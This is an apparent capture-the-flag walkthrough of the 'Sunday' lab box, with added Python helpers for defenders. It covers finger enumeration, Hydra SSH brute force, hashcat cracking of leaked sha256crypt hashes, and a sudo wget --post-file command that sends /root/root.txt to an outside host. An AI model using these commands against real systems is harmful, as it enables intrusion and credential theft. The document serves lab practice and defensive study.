(recovered from old blog, September 30th, 2018)

The way into this box uses a pretty uncommon service: finger. It is a lookup program that displays login names, full names and other details. Once the list of system users has been grabbed, Hydra brute-forces the SSH password, which is only 6 characters long.
Privilege escalation abuses a sudoers entry for the wget binary, using its --post-file option.

ENUMERATION

Nmap

Start with the classic nmap scan for running services & their version.

root@kali-oscp:~# nmap -sC -sV -oA nmap-sunday 10.10.10.76
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2018-04-30 17:25 WAT
Nmap scan report for 10.10.10.76
Host is up (0.018s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
79/tcp  open  finger  Sun Solaris fingerd
| finger: Login       Name               TTY         Idle    When    Where
|_sammy    sammy                 pts/2       1:53 Mon 12:27  10.10.14.8
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

Then a TCP SYN scan on all the remaining TCP ports from 1024 upwards.

root@kali-oscp:~# nmap -sS 10.10.10.76 -p1024-59999 -T5
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-28 10:38 WAT
Warning: 10.10.10.76 giving up on port because retransmission cap hit (2).
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.59% done; ETC: 10:49 (0:08:51 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.017s latency).
Not shown: 31860 filtered ports, 27114 closed ports
PORT      STATE SERVICE
22022/tcp open  unknown
55159/tcp open  unknown

So we have:
• OS: Solaris
• Finger (tcp 79) with the sammy user referenced
• SSH (tcp 22022)

Finger Enumeration

As we have identified the finger service, we can use Metasploit to enumerate potential system users. This can also be done with finger-user-enum from pentestmonkey.

root@kali-oscp:~# msfconsole
msf > use auxiliary/scanner/finger/finger_users
msf auxiliary(scanner/finger/finger_users) > set RHOSTS 10.10.10.76
msf auxiliary(scanner/finger/finger_users) > set RPORT 79
msf auxiliary(scanner/finger/finger_users) > exploit

Ok, so we have 2 interesting users: sammy and sunny.


SSH Bruteforce

I first tried to launch a brute-force attack using Hydra, but it takes waaaaaaay too much time.
`root@kali-oscp:~# hydra -l sunny -x 4:10:aA -s 22022 10.10.10.76 ssh`

4:10:aA means:
• 4: min chars
• 10: max chars
• aA: lowercase and uppercase letters
... -> didn't get anything & took too long
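To see why this brute force was never going to finish, here is an added example (not code from the original write-up) that expands hydra's -x charset shorthand the way hydra documents it (a = lowercase, A = uppercase, 1 = digits, anything else taken literally) and counts the candidates in a MIN:MAX:CHARSET range. The 16 tries-per-second figure is an assumption used only for perspective, not a measurement from this box.

```python
"""Size of the keyspace behind hydra's -x MIN:MAX:CHARSET option.

Added example, not code from the original write-up. The charset letters
follow hydra's documented shorthand; the tries-per-second rate passed to
years_to_exhaust() is an assumption, real throughput against sshd depends
on the server and on hydra's -t task count.
"""
import string


def expand_charset(spec: str) -> str:
    """Expand hydra's charset letters into the concrete alphabet."""
    chars = []
    for ch in spec:
        if ch == "a":
            chars.extend(string.ascii_lowercase)
        elif ch == "A":
            chars.extend(string.ascii_uppercase)
        elif ch == "1":
            chars.extend(string.digits)
        else:
            chars.append(ch)  # literal extra character, e.g. "!" or "@"
    return "".join(dict.fromkeys(chars))  # de-duplicate, keep order


def keyspace(spec: str) -> int:
    """Number of candidates hydra generates for a MIN:MAX:CHARSET spec."""
    min_len, max_len, charset = spec.split(":", 2)
    lo, hi = int(min_len), int(max_len)
    if lo < 1 or hi < lo:
        raise ValueError(f"bad length range in {spec!r}")
    n = len(expand_charset(charset))
    return sum(n ** length for length in range(lo, hi + 1))


def years_to_exhaust(spec: str, tries_per_second: float) -> float:
    """Worst-case wall-clock time to walk the whole keyspace, in years."""
    return keyspace(spec) / tries_per_second / (365 * 86400)


if __name__ == "__main__":
    # 16 tries/s is an assumed figure, not a measurement from the page.
    for spec in ("4:10:aA", "6:6:a"):
        print(f"{spec:>8}: {keyspace(spec):>24,d} candidates, "
              f"~{years_to_exhaust(spec, 16):,.1f} years at 16/s")
```

Even the narrow case that would actually have matched "sunday" (6:6:a, lowercase only) is about 309 million candidates, which is more than half a year at that rate, while the dictionary run below finishes in minutes. That gap is the whole argument for rate limiting and lockout on SSH: online guessing only works against passwords that sit in a wordlist.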

In parallel, I started a dictionary attack with a small-words dictionary, and found the password for the sunny user.
`root@kali-oscp:~# hydra -l sunny -P /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 22022 10.10.10.76 ssh`

WORKED !!! => password is "sunday"

Could have found it by myself, but using hydra is good practice :-)
`root@kali-oscp:~# ssh sunny@10.10.10.76 -p 22022`

==> Connected


PRIVILEGES ESCALATION

From Sunny to Sammy

There isn't any user.txt file in the user's home folder, so it seems I need to jump to another user. Let's start some system enumeration with LinEnum or "sudo -l", as this is where the interesting information is.

User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

uid=101(sammy) gid=10(staff) groups=10(staff)
uid=65535(sunny) gid=1(other) groups=1(other)

There is an interesting folder named /backup at the top level. It contains 2 files: one not readable, and another with SHA-256 password hashes for the sammy & sunny users.

sunny@sunday:/backup$ ls
agent22.backup  shadow.backup

sunny@sunday:/backup$ more *
agent22.backup: Permission denied
::::::::::::::
shadow.backup
::::::::::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Notes: StackOverflow question
If it starts with:
• $1$: it uses MD5.
• $5$: it uses SHA-256.
• $6$: it uses SHA-512.
• $2a$: it uses blowfish, not supported everywhere.
• Otherwise it uses DES.

So according to the hashcat documentation I will need to use mode 7400:
7400 | sha256crypt $5$, SHA256 (Unix) | Operating Systems
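The prefix rules from the notes above are easy to get wrong by eye, so here is an added example (not code from the original write-up) that classifies every line of a shadow file: locked, no-password, empty or hashed, and for hashed entries the crypt scheme, the salt and the hashcat -m mode hashcat documents for it. The sample text is the shadow.backup listing from this page.

```python
"""Identify the crypt(3) scheme of each shadow entry and its hashcat mode.

Added example, not code from the original write-up. The prefix table is
the one in the notes above plus the hashcat -m numbers hashcat documents
for each scheme; the sample is copied from the shadow.backup listing.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Modular-crypt id -> (scheme name, hashcat -m mode)
MODULAR = {"1": ("md5crypt", 500), "5": ("sha256crypt", 7400), "6": ("sha512crypt", 1800)}
BCRYPT_MODE = 3200      # bcrypt $2*$
DESCRYPT_MODE = 1500    # traditional DES crypt, 13 chars, no prefix

MODULAR_RE = re.compile(r"^\$(?P<id>[156])\$(?:rounds=\d+\$)?(?P<salt>[^$]{1,16})\$(?P<hash>[^$]+)$")
BCRYPT_RE = re.compile(r"^\$2[abxy]?\$\d\d\$(?P<salt>[./A-Za-z0-9]{22})[./A-Za-z0-9]{31}$")
DES_RE = re.compile(r"^[./A-Za-z0-9]{13}$")


@dataclass
class ShadowEntry:
    user: str
    field: str                      # raw password field
    status: str                     # locked | no-password | empty | hashed | unknown
    algorithm: Optional[str] = None
    hashcat_mode: Optional[int] = None
    salt: Optional[str] = None


def classify(user: str, field: str) -> ShadowEntry:
    """Map one shadow password field to its scheme."""
    e = ShadowEntry(user, field, "unknown")
    if field == "":
        e.status = "empty"             # no password required at all
    elif field == "NP":
        e.status = "no-password"       # Solaris: password login not possible
    elif field.startswith(("*", "!")):
        e.status = "locked"            # *LK*, *, !, !! -> account locked
    else:
        m = MODULAR_RE.match(field)
        if m:
            name, mode = MODULAR[m.group("id")]
            e.status, e.algorithm, e.hashcat_mode, e.salt = "hashed", name, mode, m.group("salt")
        else:
            m = BCRYPT_RE.match(field)
            if m:
                e.status, e.algorithm, e.hashcat_mode, e.salt = "hashed", "bcrypt", BCRYPT_MODE, m.group("salt")
            elif DES_RE.match(field):
                e.status, e.algorithm, e.hashcat_mode, e.salt = "hashed", "descrypt", DESCRYPT_MODE, field[:2]
    return e


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse user:password:... lines; other fields are ignored here."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, _, rest = line.partition(":")
        entries.append(classify(user, rest.split(":", 1)[0]))
    return entries


def crackable(entries: List[ShadowEntry]) -> List[ShadowEntry]:
    """Entries that carry a real hash, i.e. what an offline attack can target."""
    return [e for e in entries if e.status == "hashed"]


# Copied from the /backup/shadow.backup listing on this page.
SAMPLE_SHADOW = """\
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        print(f"{e.user:<10} {e.status:<12} {e.algorithm or '-':<12} -m {e.hashcat_mode or '-'}")
```

The takeaway for the defender is the output of crackable(): only two of the ten accounts have hashes at all, and a world-readable copy of that file hands both of them to an offline attack with no lockout to slow it down. Backups of /etc/shadow need the same 0400 root-only permissions as the original.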

Hashcat packages prerequisites

(not sure everybody needs to do that, but I do)
For a fully working hashcat:

root@kali-oscp:~# apt install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
root@kali-oscp:~# apt install pocl-opencl-icd && apt install -y hashcat
root@kali-oscp:~# echo '$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB' > sammy.hash
root@kali-oscp:~# hashcat -m 7400 -a 0 sammy.hash /opt/wordlists/rockyou.txt --force 
... (6min19 later ...)
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!

sunny@sunday:/backup$ ssh sammy@127.0.0.1
sammy@sunday:~$ cat Desktop/user.txt 
a3d94980**********************

From Sammy to root

Here too the sudo rights (sudo -l) have the interesting information we are looking for.

Ok, let's parse the wget manual in search of an option that will let me post a file.

root@kali-oscp:~# wget --help|grep post
       --post-data=STRING          use the POST method; send STRING as the data
       --post-file=FILE            use the POST method; send contents of FILE

From my computer (it will serve on port 8000 by default):

`python -m SimpleHTTPServer`

From Sammy shell

sammy@sunday:~$ sudo /usr/bin/wget --post-file=/root/root.txt http://10.10.14.25:8000

And get the flag
fb40fab..........................................
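The root step works because the sudo rule pins no arguments, so wget's own --post-file option is enough to read any file as root. As an added example (not code from the original write-up), here is a small audit of `sudo -l` output that flags exactly that pattern: rules granting ALL, rules for a binary whose options read and ship files when no arguments are pinned, and pinned arguments that contain a wildcard. The sample is constructed: sunny's /root/troll rule is copied from the page, sammy's /usr/bin/wget rule is assumed from the command used above, and the other two lines are made up for the audit. The FILE_READERS table is illustrative (wget as shown on this page, plus curl's equivalent switches), not an exhaustive list.

```python
"""Audit `sudo -l` output for rules that let a user read files as root.

Added example, not code from the original write-up. SAMPLE_SUDO_L is
constructed; FILE_READERS is an illustrative, not exhaustive, table.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Binaries whose own options read an arbitrary file and send it elsewhere.
FILE_READERS = {
    "wget": "--post-file / --post-data send any readable file in an HTTP POST",
    "curl": "-d @file / -T file upload any readable file",
}

# "(runas) TAG: TAG: /path args" ; tags such as NOPASSWD: or SETENV: are optional
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str      # absolute path, or ALL
    args: str         # "" means sudo allows any arguments


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Turn the rule lines of `sudo -l` into SudoRule objects."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # "User x may run..." headers and other noise
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for spec in m.group("cmd").split(","):
            cmd, _, args = spec.strip().partition(" ")
            rules.append(SudoRule(m.group("runas"), "NOPASSWD" in tags, cmd, args.strip()))
    return rules


def audit(rules: List[SudoRule]) -> List[Tuple[SudoRule, str]]:
    """Return (rule, reason) pairs for rules that expose file reads as runas."""
    findings = []
    for r in rules:
        name = r.command.rsplit("/", 1)[-1]
        if r.command == "ALL":
            findings.append((r, f"unrestricted: any command as {r.runas}"))
        elif name in FILE_READERS and not r.args:
            findings.append((r, f"{name} with no pinned arguments: {FILE_READERS[name]}"))
        elif "*" in r.args:
            # sudoers(5): '*' in arguments also matches spaces, so extra options slip through
            findings.append((r, f"wildcard in pinned arguments of {name}"))
    return findings


# Constructed sample: sunny's rule is from the page, the rest is assumed.
SAMPLE_SUDO_L = """\
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
    (root) /usr/bin/vim -R /var/log/messages
    (root) /usr/bin/wget -O /var/tmp/*
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll
"""

if __name__ == "__main__":
    for rule, reason in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        pw = "NOPASSWD" if rule.nopasswd else "password"
        print(f"({rule.runas}) {rule.command} {rule.args} [{pw}]: {reason}")
```

The fix on the sudoers side is either to drop the wget rule or to pin its full argument list (an empty "" pins it to no arguments at all); a download helper that really must run as root is better wrapped in a script that takes no user-controlled options. On the detection side, the sudo log line for this step shows wget being run as root with --post-file pointing at /root, which is a cheap thing to alert on.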